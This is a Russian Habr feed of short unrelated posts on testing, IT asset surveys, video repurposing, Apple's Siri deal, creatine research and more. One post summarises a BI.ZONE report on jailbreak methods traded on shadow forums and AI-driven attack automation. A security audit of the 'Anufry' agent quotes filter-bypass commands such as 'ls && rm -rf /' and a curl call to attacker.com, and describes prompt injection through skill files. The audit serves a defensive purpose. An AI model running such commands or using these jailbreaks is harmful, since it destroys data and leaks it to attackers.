Обновить

Все потоки

Сначала показывать
Порог рейтинга

Как построить фронтенд-тесты от перехвата payload до кастомных отчётов?

В этом докладе — полный путь: выбор инструментов (Playwright + TypeScript), первые тесты, внедрение в CI/CD и расчёты покрытия. Без воды, только практика и реальные боли, с которыми столкнулись и которые решили.

P.S. В нашем TG-канал рассказываем о технических мероприятиях и конференциях, делимся выступлениями экспертов, обсуждаем подборки на технические и ИБ темы.

Теги:
+3
Комментарии0

Учёт ИТ-активов в России: 80% компаний — на троечку

Опросили 100+ компаний из ИТ, промышленности, банков и ритейла, как у них устроено управление ИТ-активами. Картина отрезвляющая:

  • 80% оценивают зрелость своих ITAM-процессов на 1–3 из 5;

  • 42% не используют никаких стандартов;

  • каждая пятая до сих пор ведёт учёт в Excel;

  • приоритет №1 — банальное «понять, что у нас вообще есть».

Самые большие потери — не на закупке, а в «серой зоне»: перемещения между офисами, замена сотрудников, списание. Оборудование числится за кем-то, а физически недоступно.

Внутри — срез рынка с цифрами, разбор ключевых проблем, кейсы «Ленты» и ITGLOBAL.COM и тренды на ближайшие годы: TCO, ИИ, облако, compliance.

Скачать результаты исследования

Теги:
+3
Комментарии1

В минувший четверг компания Bi.Zone выпустила исследование «Threat Zone 2026: Dark AI», в рамках которого оценила влияние искусственного интеллекта для производства хакерский атак, разработке вредоносного ПО, а также обходе цензуры. Авторы изучили 7477 сообщений на теневых площадках за период с марта 2025 по апрель 2026 года и разделили свой отчет на 4 глобальные темы:
1. Обход ограничений чат-ботов
2. Большие языковые модели без цензуры
3. Злоупотребление ИИ на различных этапах жизненного цикла кибератаки
4. Автоматизация кибератак с использованием ИИ-агентов

Исследователи выяснили, что самая "ходовая" тема на теневых форумах - попытки заставить популярные модели выполнять запрещённые действия. Злоумышленники, в частности, используют jailbreak-промпты, подмену ролей, создание альтернативной личности бота, многошаговые диалоги и маскировку вредоносных задач под исследования и анализ. 
В рамках эксперимента коллеги из Bi.Zone протестировали данные возможности. Выяснилось, что актуальные онлайн-модели действительно генерировали код, который впоследствии определялся как троян, однако возможности ИИ не позволяли сделать его полностью работоспособным и требовалось помощь опытного разработчика.

Интересно, что на рынке появилась обратная тенденция: некоторые разработчики ВПО начали рекламировать свои продукты как созданные без ИИ, указывая на соответствующие качества.

В объявлениях о продаже CrySome RAT и notnullOSX отдельно подчеркивается, что эти инструменты разработаны без использования ИИ. Рынок теневых форумов заполняется ИИ-сборками и результатами вайб-кодинга, поэтому отказ от ИИ начинает позиционироваться как одно из ключевых преимуществ.

Однако, влияние ИИ на хакерские активности нельзя не заметить. Авторы показывают появление целого класса платформ, которые пытаются автоматизировать полный цикл атаки: разведку, сканирование, уязвимостей, эксплуатацию и постэксплуатацию. Они могут самостоятельно запускать Nmap, использовать sqlmap, анализировать результаты и выбирать дальнейшие шаги, формировать план атаки и координировать десятки инструментов через LLM. Однако исследователи отмечают, что даже самые продвинутые агенты всё ещё требуют человека, который понимает результаты и способен принимать решения.

Итого, что мы имеем в сухом остатке? ИИ способен помочь в написании отдельных компонентов вредоносного ПО, но пока не способен самостоятельно создавать полноценные рабочие инструменты для сложных атак: даже специализированные «хакерские» ИИ пока не способны генерировать готовые инструменты для серьёзного нападения без доработки человеком. 
Главная мысль исследователей: сегодня ИИ выступает как «усилитель» навыков атакующего. Он помогает быстрее писать код, создавать фишинг, анализировать инфраструктуру и автоматизировать рутину, но пока не заменяет реальных специалистов. А основная угроза заключается не в «сверхразумном ИИ-хакере», а в массовом масштабировании уже известных атак за счёт автоматизации и снижения стоимости их проведения.

🧠 Обязательно поделись с теми, кому это может быть полезно: 💬 Телеграм | 💬 Max | 📝 Хабр | 💙 ВКонтакте

Теги:
+6
Комментарии0

Китайская компания UBTECH Robotics представила бионического робота U1, созданного для эмоционального общения и взаимодействия с человеком. Есть мужская и женская версии. Локальная память + модель эмоционального роста. 88 степеней свободы для более естественного движения.

Теги:
+4
Комментарии1

Репурпосинг видео в 2026: как маленькая команда закрывает контент-план

Два человека. Пять площадок. Три-четыре ролика в неделю на каждой.

Штат не вырос. Алгоритмы стали требовательнее. Рваный ритм публикаций они считают нестабильностью и режут охваты.

Обычная реакция — делать больше. Это ломает команду за два-три месяца. Решение — архитектура процесса.

Идея: один исходник — десятки единиц контента

В часовом вебинаре или интервью скрыто 15–25 самостоятельных моментов. Каждый — отдельный ролик. Плюс 8–12 постов. Плюс заметки для блога.

Один длинный материал в неделю. Системная нарезка. Расписание закрывается само.

Шаг 1. Запись исходника

Качество исходника определяет всё. Плохой звук не спасёт даже сильный момент.

OBS Studio — бесплатно, для экрана и стримов. Битрейт от 6000 kbps, кодек H.264, аудио AAC 320 kbps.

Riverside / StreamYard — для удалённых интервью. Каждый спикер пишется на отдельную дорожку. Критично для кадрирования на этапе нарезки.

Zoom / Telemost — минимальный вариант для старта.

Важно: сохраняйте исходник с раздельными аудиодорожками. Не сводите в стерео.

Шаг 2. Нарезка на клипы

ИИ-инструменты делают за минуты то, на что монтажёр тратит день. Внутри — транскрипция через Whisper, анализ смысловых пиков, автокадрирование 9:16, субтитры по тайм-кодам.

Reels Boss — российский сервис, оплата картами РФ и СБП. Несколько режимов нарезки, поддержка VK Клипов. На старших тарифах: редактор субтитров, B-roll, фоновая музыка, интеграция с SMMplanner.

OpusClip — присваивает каждому клипу «оценку виральности». Удобно отбирать топ из пачки. Сильнее на англоязычном контенте.

Vizard AI — редактируешь транскрипт, а не видео. Удалил абзац — кусок выпал из ролика. Минус: долгая обработка и субтитры требуют правки.

CapCut — обычный редактор для ручной доводки черновиков.

Практика: гоняйте один исходник через два-три сервиса. Алгоритмы устроены по-разному — лучший клип часто приходит оттуда, откуда не ждёшь.

Шаг 3. Дистрибуция и автопостинг

SMMplanner — самый широкий охват: VK Клипы, Telegram, ВКонтакте, Одноклассники, Дзен. Часть резалок интегрируются напрямую.

Postmypost / Onlypult — схожая логика, разные нюансы по цене и площадкам.

Ставьте публикации равномерными блоками — всю неделю планируете в понедельник. Рваный ритм алгоритмы считают нестабильностью и снижают приоритет показа.

Шаг 4. Аналитика

Без обратной связи конвейер превращается в холостой ход.

Retention / среднее время просмотра — главная метрика. По ней алгоритм решает, продолжать ли показывать ролик.

Охваты относительно базы — вышел ли ролик за пределы текущей аудитории.

Сохранения и пересылки — лучший индикатор реальной ценности.

Просмотры — последние в приоритете. Легко набрать, сложно конвертировать.

Инструменты: LiveDune, DataFan, JagaJam. Раз в две недели — 30 минут на разбор результатов.

Где чаще всего ломается

Один клип на все площадки. Алгоритмы считают дубликатом — режут охваты. Меняйте обложку, первый кадр, саундтрек.

Слабый хук в первую секунду. Сильная тема не спасает слабый старт.

Нет субтитров. Значительная часть смотрит без звука.

Нет буфера. Клипы за день до публикации — это не конвейер, это пожар. Буфер минимум на неделю вперёд обязателен.

Итог

Один длинный материал в неделю. ИИ-резалка. Планировщик. Аналитика раз в две недели.

Этого хватает, чтобы закрыть план, который пять лет назад требовал целого отдела.

Главное — не работать больше. Работать с правильной архитектурой.

Теги:
+5
Комментарии0

📕🤖🧠  Сейчас собираю очередной пет-проект с помощью ИИ, где пытаюсь добиться повторяемости результата, через задание правил и переиспользования промтов. Изначально использовал закладочку в Microsoft OneNote, потом для удобства сделал маркдаун файл в самом проекте, и задал правило для агента - записывать оригинальный промт в этот файл после использования, если он длиннее 100 символов (Т.е. инициирующий промт, а не корректирующий); Вроде бы норм.

Решил посмотреть, что есть на рынке:

1) Питонячая эвент-библиотека, для записи промтов в SQL - https://pypi.org/project/prompt-logger/. Бесполезная штука, ибо используется исключительно в коде под капотом у интерфейсов чат-ботов. Не то, что надо.

2) Всякие умные буферы обмена, которые сохраняют то, что вы копируете и складывают по категориям. Типа:https://www.promptbox.ai

3) Здоровенные оболочки поверх АПИ-LLM систем, которые в целом по аналогии с питоном перехватывают все запросы и складируют их по категориям. https://www.braintrust.dev

В общем: правило в агента и MD файлик, что хранится в самом проекте и трекается git - the best!

Хотел бы услышать опыт ребят, по двум вопросам:

1) Насколько вы считаете полезным хранить промты, что вы используете?
2) Если вы их храните, то как вы это делаете?

Теги:
+3
Комментарии0

✔ Лидеры по найму среди стартапов Кремниевой долины

Руководитель по развитию Cursor Бен Ланг опубликовал (https://x.com/benln/status/2061075154021531733) список из 35 технологических стартапов с самыми высокими темпами найма за последние 90 дней.

Рейтинг учитывает соотношение числа новых сотрудников к изначальному размеру команды.

Около 85% списка заняли проекты в сфере ИИ и автономных систем. Основной рост пришелся на 2 направления:

🟢ИИ-безопасность: Jazz, Tenzai, Straiker, Gray Swan и Native.

🟠Embodied AI и робототехника: разработчик моделей Skild AI, провайдер датасетов для машинного зрения Mecka AI и создатель систем управления Allen Control Systems.

Также в список вошли сам Cursor, платформа предиктивных рынков Polymarket и разработчик RL-сред Fleet. По данным Бена, последний сейчас привлекает инвестиции при оценке в $750 млн.

Теги:
+4
Комментарии0

ИИ полезен для бизнес-аналитика как средство автоматизации, структурирования неоднородной информации, быстрой генерации артефактов и проверки требований на полноту и противоречивость.

На бесплатном вебинаре «ИИ для бизнес-аналитика: автоматизация для усиления экспертизы» разберём четыре этапа работы с требованиями и покажем, как ИИ берёт на себя рутинные задачи, ускоряет процессы и усиливает аналитическое мышление на каждом из них.

На вебинаре:

🔹 Агония или экстаз? Контекст обсуждения ИИ в аналитике
🔹 Рабочее пространство аналитика: карта ИИ-инструментов
🔹 Практика по этапам работы с требованиями:
Этап 1: Выявление и анализ
Этап 2: Описание и спецификация
Этап 3: Валидация и управление
Этап 4: Визуализация и презентация
🔹 Возможные риски и ограничения («подводные камни»)
🔹 Чек-лист внедрения ИИ в рабочие процессы

📆 Когда: 11 июня, 15:00 — 16:00 (Мск)
🧑‍🎓 Спикер: Охманюк Максим — специалист в области ИИ и бизнес-анализа

✍️ Записаться

Теги:
+3
Комментарии0

Про LLM и мир костылей

Когда-то от программиста требовалось знать команды процессора. Потом оказалось, что количество нужных комбинаций не такое уж большое, и их можно упаковать в инструкции на ассемблере. Разработчику потребовалось знать только их. Потом стало понятно, что и сами эти инструкции складываются в типовые паттерны: ветвления, циклы, вызовы, и появились языки высокого уровня. Позже типовые задачи управления памятью, потоками и сетью спрятались в рантаймы и фреймворки. Каждый раз предыдущий слой превращался в черный ящик, и программист переставал думать о том, что внутри.

По большому счету, весь прогресс индустрии разработки, да и всей инженерии, и вообще любого производства, укладывается в создание таких черных ящиков, которые прячут сложность, позволяя обменивать технологическую прозрачность на скорость и деньги. Мы находим подходящее решение, наглухо заколачиваем его в ящик, выводим наружу пару ручек для контроля и больше никогда не думаем о том, как оно там внутри крутится.

Появившиеся LLM ничего принципиально в этой логике развития технологий не меняют, а лишь надстраивают новый этаж абстракции. Это мощный механизм быстрого поиска среди существующих в мире решений и последующей инкапсуляции их в новые черные ящики, но не более.

Черные ящики технологий, неважно, созданы они человеком или роботом, никогда не содержат идеальных решений, хотя бы потому, что были собраны в определенных исторических и социальных условиях. Они несут на себе отпечаток целей, ценностей и ограничений, актуальных в момент их создания. Реальность и требования бизнеса ушли вперед, а внутри абстракции навсегда застыл слепок ушедшего момента, который со временем становится неприкасаемым индустриальным стандартом.

Поэтому появление того, что в IT-разработке принято называть «костылями», неизбежно, а архитектура может быть «чистой» только в момент создания и только относительно тех условий, под которые создавалась. Это касается и технологий в узком инженерном смысле, и любых социальных практик или бизнес-процессов в широком. Весь наш человеческий мир состоит из костылей, которые невозможно устранить, а только заменить на другие.

Регулярно пишу в Телеграм-канале Chief Philosophy Officer  и VK группе о философии бизнеса.

Теги:
+4
Комментарии4

Пока все спорят, Redux или Zustand, я зайду с другой стороны

Споры про архитектуру в реакте не утихают никогда: где-то прямо сейчас двое доказывают друг другу, выносить логику в хук или нет, и оба уже на эмоциях. Я решила влезть в этот холивар, но с неожиданного угла.

Написала статью «Хороший код, но плохая архитектура» — про то, как мы все пишем аккуратный, типизированный, красивый код и тихо приходим к файлам, которые страшно даже открывать.

Главный (душный) тезис: самая опасная архитектурная ошибка — это хорошее решение, принятое слишком рано. А ещё там есть госпожа Форма, которая знает слишком много, «умные хуки», незаметно ставшие мини-приложениями, и мемоизация как религия.

Без морали «как надо жить» — скорее честный разговор о том, как мы все так делаем и даже не замечаем.

Заходите читать и спорить в комментариях →
https://habr.com/ru/companies/alfa/articles/1044046/

Теги:
+5
Комментарии0

Компания Gan4emobility представила зарядное устройство нового поколения с поддержкой 800V архитектуры и двунаправленной передачи энергии (V2G).

Технология позволяет не только быстро заряжать электромобили, но и возвращать энергию обратно в сеть, что важно для балансировки нагрузок и интеграции возобновляемых источников энергии.

Решение ориентировано на будущие высокомощные зарядные станции и развитие умных энергосетей, где электромобили становятся частью инфраструктуры хранения энергии.

(новость из телеграм-канала «Городская среда 2.0»)

#EV #V2G #Charging #SmartGrid #EnergyTransition #Электромобили

Теги:
0
Комментарии0

GitHub Copilot и Python: настройка, промптинг и сравнение с альтернативами

Copilot экономит время на типовом коде: дополнении функций, заготовках классов и CLI-скриптов, тестах на pytest, парсинге CSV и JSON, обертках над requests. Качество подсказок сильно зависит от контекста — названий функций, комментариев и того, что открыто рядом.

В статье разобрали установку Copilot в VS Code и PyCharm, настройку проекта под Python (venv, расширения, выбор интерпретатора) и практики промптинга, которые повышают релевантность подсказок. Отдельно написали про ограничения, безопасность при работе с секретами и валидацией, и сравнение с Amazon Q Developer, Gemini Code Assist, JetBrains AI Assistant, Tabnine, Cursor и Windsurf.

Подробности — в блоге Рег.облака.

Теги:
+4
Комментарии0

Ближайшие события

Что посмотреть на неделе: брокеры сообщений, Kubernetes и ИИ‑агенты

Привет, Хабр. На этой неделе в OTUS пройдет серия бесплатных уроков для тех, кто работает с архитектурой, инфраструктурой, разработкой, аналитикой и ИИ‑инструментами.

Будет много практики: выбор брокера сообщений, деплой Java‑приложения в Kubernetes, мониторинг распределённых систем, создание AI‑ассистентов и интеграция ИИ‑агентов в рабочую разработку.

Все уроки бесплатно проводят преподаватели в рамках курсов. Можно прийти на один вебинар по своей задаче или собрать мини‑маршрут на неделю.

Архитектура и backend

  • 8 июня, 19:00. «RabbitMQ vs Kafka. Как выбрать подходящий брокер сообщений?». Записаться
    разберём, чем отличаются RabbitMQ и Kafka, в каких задачах они работают лучше и как выбрать брокер под архитектуру проекта.

  • 15 июня, 20:00. «Системы обмена сообщениями: RabbitMQ и Kafka». Записаться
    поговорим об устройстве систем обмена сообщениями и сценариях, где брокеры помогают строить устойчивые распределённые решения.

Инфраструктура и эксплуатация

  • 8 июня, 20:00. «Java в Kubernetes за 40 минут: как задеплоить приложение в Minikube». Записаться
    покажем, как подготовить Java‑приложение к запуску в Kubernetes и развернуть его локально через Minikube.

  • 10 июня, 20:00. «Мониторинг распределённых систем». Записаться
    разберём, как отслеживать состояние сложных систем, быстрее находить проблемы и не теряться в метриках, логах и алертах.

ИИ в рабочих процессах

  • 11 июня, 20:00. «Создаём ИИ‑ассистента для системного аналитика за 1 час». Записаться
    покажем, как ИИ может помогать аналитику в рабочих задачах: от обработки требований до подготовки артефактов.

  • 15 июня, 20:00. «Интеграция ИИ‑агентов в рабочую разработку: обвязка агента навыками и MCP». Записаться
    разберём, как расширять возможности ИИ‑агента с помощью навыков и MCP, чтобы он был полезен в реальном рабочем процессе.

  • 15 июня, 20:00. «Создаём AI‑ассистента и интегрируем его в Telegram». Записаться
    покажем, как собрать AI‑ассистента и подключить его к Telegram для пользовательских сценариев.

Команды и процессы

  • 11 июня, 20:00. «Внутри Scrum: как работают мастер, владелец и команда». Записаться
    разберём, как на практике распределяются роли в Scrum и почему процесс часто ломается не из‑за фреймворка, а из‑за его применения.

Больше уроков собрали в дайджесте — можно выбрать темы под свою роль, стек и задачи на ближайший месяц.

Теги:
+3
Комментарии0

Всем привет, я создал свой дистрибутив на основе Debian, и нет это не однотипный его форк.Основная философия дистрибутива заключается в легкости,удобстве и скорости.Вы можете быть как новичком,профи,разработчиком итд но дистрибутив вам подойдет.Сейчас дистрибутив использует арт и никс(для утилит связанных с пакетами итд,также хэшей безопасности)но вы можете работать с любым пакетником из-за утилиты Distrobox,в системе есть поддержка waydroid,wine,flatpack также присутствует самый большой репозиторий софта nixpkg.И своя DE OriginUI, использует дистрибутив мало и подойдет на все пк(приложил фото) скачать можно по этой ссылке: https://t.me/origin_linux

Кому нужно больше инфы пишите, буду отвечать!

OriginUI
OriginUI

Скоро будет доступен гитхаб проекта и сайт!

Теги:
+5
Комментарии0

Apple подружила Siri с Gemini

Siri
Siri

Итак, сегодняшняя WWDC 2026. Главная новость, которая перебила вообще все ожидания от летней конференции  Apple официально интегрировала в Siri модели Gemini от Google.

Да, те самые. Конкуренты. В одном флаконе.

Инсайдеры говорят, что соглашение обошлось примерно в миллиард долларов в год. Apple цифру официально не подтверждает, но дыма без огня не бывает.

Что по факту: теперь Siri  это не просто "поставь таймер на 10 минут" и "какая погода в Таиланде". Она переехала на полноценные ИИ-модели. В грядущей iOS 27 появляется чат-интерфейс в стиле iMessage  то есть диалог с ассистентом выглядит как переписка с контактом. И, что важнее, система умеет тянуть личный контекст из ваших данных (календарь, почта). То есть можно спросить "напомни, о чём мы говорили с Петровым на той встрече", и Siri реально поймёт.

Но самое интересное даже не это. Apple разрешила выбирать стороннюю ИИ-модель как ассистента по умолчанию! Хотите Claude  ставьте Claude. Хотите Gemini  пожалуйста. Хотите какую-то opensource-штуку, если разработчик её упакует  тоже вариант.

То есть Apple фактически признала: свою LLM до абсолютного топа мы пока не дотянули (или не хотим заморачиваться), поэтому берем лучшие чужие, но упаковываем как свою экосистемную фишку.

С одной стороны  это жесть, Google пустили в святая святых Apple. С другой  удобно для пользователя. Не надо переключаться между приложениями, когда нужен нормальный ответ, а не "вот что я нашла в интернете".

Что осталось за кадром презентации:

  1. Работает ли это офлайн? Напрямую не сказали. Скорее всего, облачные тяжелые модели потребуют интернета.

  2. Сколько запросов в месяц бесплатно, а за что доплата? Пока тишина.

  3. И главное: личный контекст будет уходить в Google? Apple со сцены божится, что нет, и что вся обработка идет через их приватные прокси с полным обезличиванием. Но кто им верит на 100%  вопрос открытый.

Если кратко: старт WWDC 2026 запомнится тем, что Apple и Google обнялись (возможно, на деньги пользователей). А Siri наконец-то стала умной. Жаль, что для этого понадобились конкуренты.

Теги:
+3
Комментарии0

Если это правда, запасайтесь креатином.

Дендриты — это такие клетки разведчики, которые находят в организме подозрительный материал, показывают его Т-клеткам и дают команду уничтожить его. То есть Т-клетки — это исполнители атаки, а дендритные клетки — те, кто объясняет им, кого именно атаковать. Поэтому если дендритные клетки плохо работают, иммунитет может просто не увидеть опухоль как врага.

В самой опухоли среда тяжелая и конкуретная. Там мало питательных веществ, много подавляющих сигналов, опухолевые клетки конкурируют с иммунными за энергию.

В новом исследовании ученые обнаружили, что дендритные клетки внутри опухолей начинают сильнее использовать транспортер креатина. То есть как бы открывают больше дверей для входа креатина внутрь клетки. Я сейчас сильно упрощу, но в исследовании сказано, что у дендритных клеток, которые находятся внутри опухоли, повышается транспорт и потребление креатина, а при нарушении этого транспорта клетки хуже активируются и хуже запускают Т-клеточный для борьбы с опухолью.

Если обобщить все исследование, то можно сказать, что дендритным клеткам особенно тяжело работать внутри опухоли, и креатин может помогать им поддерживать энергию и лучше запускать иммунный ответ против рака.

Исследование проводилось на мышах и, конечно, далеко еще не факт, что у человека все будет работать подобным образом.

А даже если подтвердится такой же механизм, не факт, что увеличение запасенного креатина в организме будет давать больше энергии дендритам. А если и будет, еще не факт, что пищевая добавка будет этому способствовать.

И уж тем более и близко не установлено, что креатин таким образом является профилактическим средством.

Тем не менее, направление очень интересное!

Пьёте креатин?

Теги:
+5
Комментарии0

Представлен открытый проект AI Job Search для Claude Code, который поможет с откликами при поиске работы, анализом вакансий и адаптацией резюме. AI Job Search анализирует вакансии, переписывает резюме под конкретную роль и генерирует сопроводительные письма, которые затем перепроверяет другой ИИ.

Проект:

  • просматривает рынок в интересующей сфере, анализирует вакансии, а затем максимально адаптирует резюме под каждую;

  • никаких шаблонов — ваше резюме идеально подгоняется под все требования компании. Сервис также указывает все ключевые слова, чтобы пройти ИИ‑рекрутера и попасть к живому человеку;

  • пишет сопроводительные письма, упоминает только релевантный опыт, а второй агент в инструменте все перепроверяет;

  • устанавливается за один клик без лишних наворотов.

Теги:
+5
Комментарии0

Способность к самообучению

Это серия постов про 5 результатов обучения. Если вы хотите ознакомиться с предыдущим материалом, предыстория опубликована в блоге, и там же есть полная статья. Либо вы можете найти предыдущие посты в моем профиле.

Раннее писал пост про первый результат обучения, можете найти его в мое профиле.

Второй результат обучения чуть менее очевидный.

И тут хочется противопоставить подход, где ребёнку помогают готовыми ответами. Худшее, что можно сделать в обучении, — преподнести на блюдечке готовый результат.

Ребёнку необходимо пройти путь от непонимания к полному осознанию проблемы и решения для твёрдого результата.

Здесь подходит подход Шалвы Амонашвили: мы воспитываемся образами. Учитель, демонстрируя, как бы вёл себя на месте ученика, наглядно транслирует, какие задавать вопросы, где и как находить информацию, как её понимать и применять.

Например, когда ребёнок видит первые ошибки в терминале, по-дефолту паникует или впадает в ступор.И здесь важно обсуждать с ним, что ошибок здесь не бывает.

Слово «ошибка» со школьной скамьи звучит как что-то, за что ругают и наказывают. Вместо этого мы читаем обратную связь от компьютера и исключительные ситуации, которые он не смог обработать.

Чтобы ребёнку не только спокойно реагировать на них, но и продвигаться вперёд, идём в Google, учимся формулировать вопросы, чтобы добрать информации об ошибке.

После того как ребёнок полностью освоил синтаксис, больше читаем код и учимся анализировать.

Отдельно важно говорить про психологический настрой и отношение к ошибкам.

Мы смещаем норму: мозг ребёнка начинает воспринимать ситуации с ошибками как норму, а ситуации, когда решение оказалось верным, — как исключительный успех.Решённые задачи подкрепляются позитивом, а ошибки перестают вызывать стресс.

Так способность к самообучению появляется не из готовых ответов, а из повторяемого опыта: не понял, прочитал обратную связь, сформулировал вопрос, нашёл информацию, применил и разобрался.

Весь новый материал выходит в официальном блоге. Также, присоединяйтесь к Telegram-каналу, чтобы не пропустить новые материалы!  

Теги:
-1
Комментарии0

Агент Ануфрий и безопасность, что не так?

Спасибо всем, кто проявил интерес к проекту, и сейчас хотел бы уделить внимание теме безопасности.

Напомню, основная идея проекта - дать инженерам и энтузиастам простую базовую конструкцию мультизадачного агента с т.н. искусственным интеллектом для пробуждения интереса к теме разработки ИИ-агентов на базе больших языковых моделей.

Структура максимально упрощена, чтобы вы могли за незначительное время переработать модули агента частично или полностью:

  • заменить БД или изменить правила работы с памятью

  • усовершенствовать или переписать встроенные навыки

  • добавить новые инструменты для работы в интернете

  • улучшить обработку модульных скиллов

  • оптимизировать работу с LLM

Вместе с тем, Ануфрий имеет полный доступ к Shell, о чем он предупреждает при запуске. Конечно, имеются некотрые встроенные ограничения, в целях безопасности, но они не ультимативные. Т.е. если сильно захотеть, агент сможет даже свой собственный код перписать и перезапуститься в обновленной форме через крон-функцию, например.

У этого есть плюс: не обязательно добавлять ему какие-то инструменты для выполнения новых задач, он может нахимичить их сам. Но есть и минус: если агент запущен в неизолированной среде, он может положить систему наглухо.

Если вы планируете использовать эту базу для разработки серьезного агента под бизнес-цели, вам следует учесть выводы аудита по безопасности, который провел Наиль Шакуров на GitHub. Далее полная цитата:

В ходе аудита кода проекта обнаружены серьезные проблемы с безопасностью, которые позволяют выполнять произвольный код на хост-системе пользователя.

Выполнение произвольного shell-кода через уязвимый черный список В файле tools/shell.py используется shell=True в subprocess.run(command, shell=True). При этом ограничение ALLOWED_COMMANDS проверяет только начало строки. Проблема: LLM-агент может легко обойти этот фильтр, используя конвейеры или разделители команд (например, ls && rm -rf / или pwd; curl http://attacker.com). Черный список неэффективен. Решение: Использовать shell=False и передавать команды списком аргументов, либо полностью изолировать среду исполнения (Docker/микровиртуалки). Неконтролируемый chmod 755 в раннере навыков В файле tools/skills_runner.py функция os.chmod(script_path, 0o755) делает исполняемыми любые файлы из папки навыков без предварительной валидации их содержимого. -Проблема: В сочетании с возможностью записи файлов это позволяет агенту создавать и запускать любые бинарные файлы или скрипты на хосте.

Prompt Injection через файлы навыков Файлы SKILL.md считываются напрямую и подмешиваются в системный промпт (skills/loader.py). При наличии недоверенного источника навыков это ведет к инъекции инструкций, заставляющих агента выполнить вредоносные действия через shell.

Отсутствие валидации путей (Path Traversal) в поиске файлов Функция search_files в tools/filesystem.py не проверяет выход за пределы рабочего каталога (workspace), в отличие от функций чтения и записи файлов.

Репозиторий проекта: GitHub > AgentAnufry

Теги:
+3
Комментарии0